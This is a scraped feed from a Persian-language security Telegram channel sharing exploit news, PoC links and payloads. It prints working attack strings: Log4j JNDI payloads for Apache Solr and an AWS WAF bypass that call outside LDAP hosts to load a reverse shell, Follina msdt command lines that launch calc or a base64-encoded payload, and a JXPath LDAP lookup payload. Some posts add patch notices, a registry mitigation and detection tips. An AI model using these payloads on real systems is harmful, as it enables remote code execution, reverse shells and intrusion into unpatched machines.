Security Analysis
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
چطوری سطح دسترسی رو با استفاده از OpenVAS بالا میبریم ؟

https://csal.medium.com/pentesters-tricks-local-privilege-escalation-in-openvas-fe933d7f161f
#tools #openvas #exploit
@securation
اکسپلویت بالا بردن سطح دسترسی در Ubuntu OverlayFS که نسخه های مختلف زیر رو در بر میگیره :‌


Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM

البته این آسیب پذیری چند روز پیش پچ براش اومد و اوبونتو خودتون رو آپدیت کنید.

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7c03e2cda4a584cadc398e8f6641ca9988a39d52
https://ubuntu.com/security/CVE-2021-3493

#pwn #ubuntu #exploit #LPE

@securation
apache solr EXP #log4j

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json

#log4j #apache #exploit
@securation
⭕️ Previous AWS WAF bypass is patched.. here is another:

${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o}

#jndi #log4j #exploit #bypass
@securation
Zero-Click #PoC Trigger for CVE-2021-1965 (Qualcomm SnapDragon WiFi Driver #RCE)

https://github.com/parsdefense/CVE-2021-1965/blob/main/CVE-2021-1965-poc.c

https://source.codeaurora.org/quic/qsdk/platform/vendor/qcom-opensource/wlan/qca-wifi-host-cmn/commit/?id=a426e5e1668fff3dfe8bde777a9340cbc129f8df
#exploit #Qualcomm #snapdragon
@securation
⭕️ Advanced Windows exploit development resources

00 - Windows Rootkits
01 - Windows kernel mitigations
02 - Windows kernel shellcode
03 - Windows kernel exploitation
04 -Windows kernel GDI exploitation
05 - Windows kernel Win32k.sys research
06 - Windows Kernel logic bugs
07 - Windows kernel driver development
08 - Windows internals
09 - Advanced Windows debugging
10 - 0days - APT advanced malware research
11 - Video game cheating (kernel mode stuff sometimes)
12 - Hyper-V and VM / sandbox escape
13 - Fuzzing
14 - Windows browser exploitation
15 - books, certifications and courses

https://github.com/FULLSHADE/WindowsExploitationResources
#exploit #pwn #windows
@securation
👍6🔥4
exploit.py
5.6 KB
CVE-2022-1329
WordPress-Elementor-3.6.0-3.6.1-3.6.2
type: RCE

#exploit #rce #poc
@securation
⭕️ در initial access که جزیی از پروسه Red Teaming و در حملات Client access هست، ما تکنیک های متفاوتی میتوانیم اجرا کنیم اعم از macro ها در نرم افزار های گروه آفیس و...
حالا آسیب پذیری RCE را بررسی میکنیم که در ویژگی شبیه macro به اسم remote template که با پروتکلی به اسم MSDT این اتفاق صورت میگیره که باید گفت بر روی wordو teams و Excel و outlook و Foxit PDF صورت میگیره ناگفته نمونه که به تنهایی هم میتوان با استفاده از اکسپلویت و اجرای دستورات هم از این آسیب پذیری بهره ببریم که در واقع ما میتونیم به صورت ریموت یک فایل html را اجرا کنیم , چون ربطی به ماکرو ها نداره ما ماکرو رو هم غیر فعال کنیم ازین تکنیک میتوان استفاده کرد.
حالا نکته ای که هست
با اجرای این خط کامند:

msdt /id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"

ماشین حساب اجرا میشه
و با اجرای :

msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\"

اگر جای base64_payload پیلود ما باشه اجرا میشه .

برای اجرای این مورد میتوان از روشهای زیر استفاده کرد :‌
https://github.com/Hrishikesh7665/Follina_Exploiter_CLI
https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina
https://github.com/JohnHammond/msdt-follina
از این ابزار ها میتوان به راحتی استفاده کرد.
https://github.com/rayorole/CVE-2022-30190
این هم فایل HTML مورد نظر هستش
بعد از تست آسیب پذیری میرسه به اینکه باید چکار کرد؟
اول برای تست کردن اینکه آیا فایلی آلوده هست یا خیر , دو راه هست
راه اول اینه که فایل دریافتی را به zip تبدیل کنیم و \word_rels\Document.xml.rels رو بررسی کنیم, برای اینکار ابزاری برای تست فایل ها در این لینک هست.
در ادامه برای جلوگیری از این آسیب پذیری هم در رجیستری مسیر HKEY_CLASSES_ROOT\ms-msdt را حذف میکنیم.
نکته دیگه ای که هست حالا ما برای شناسایی اینکه ایا اجرا شده این اسیب پذیری در سیستممون یا خیر چه باید کنیم؟
اگر به صورت کامندی صورت گرفته باشه باید
در پروسه ها به دنبال msdt و sdiaghost و conhost بگردیم
حالا اگر وردی اجرا شود , پروسه winword و msiexec و mshta و msdt مشکوک میتونه باشه. نکته بعدی که میتونه اهمیت داشته باشه
به هر طریقی که ما اجرا کنیم
یک فایل xml ایجاد میشه که مشخص میکنه این اتفاق افتاده(البته خیلی این مورد اهمیت نداره چونن میتونه هکر بعد از اقدامش پاکشون کنه )
در مسیر appdata/local/diagnostics هستش.

#redteam #follina #exploit #analysis
@securation
🔥11👍5
⭕️ CVE-2022-32250

Linux Kernel LPE

demo video : exploit

#exploit #linux #lpe
@securation
🔥5👎1
👍3
⭕️Apache Commons Jxpath (CVE-2022-41852)

Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");

PoC:
https://github.com/Warxim/CVE-2022-41852

Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/

#apache #jxpath #exploit
@securation
👍4
🤩6👍1
⭕️ بیش از 199هزار تا روتر آسیب پذیر میکروتیک در ایران وجود داره آپدیت کنید تا به مشکل اساسی برنخوردید.

https://vulncheck.com/blog/mikrotik-foisted-revisited
#exploit #mikrotik
@securation
👍12👎4😱1
⭕️آسیب پذیری با شماره CVE-2023-29357 برای Microsoft SharePoint Server ثبت شده که اکسپلویت اون در گیت هاب در دسترس است.
تارگت های زیادی در ایران آسیب پذیر هستند، لطفا بروزرسانی کنید.


https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam
@securation
🤩12👍3😱2🔥1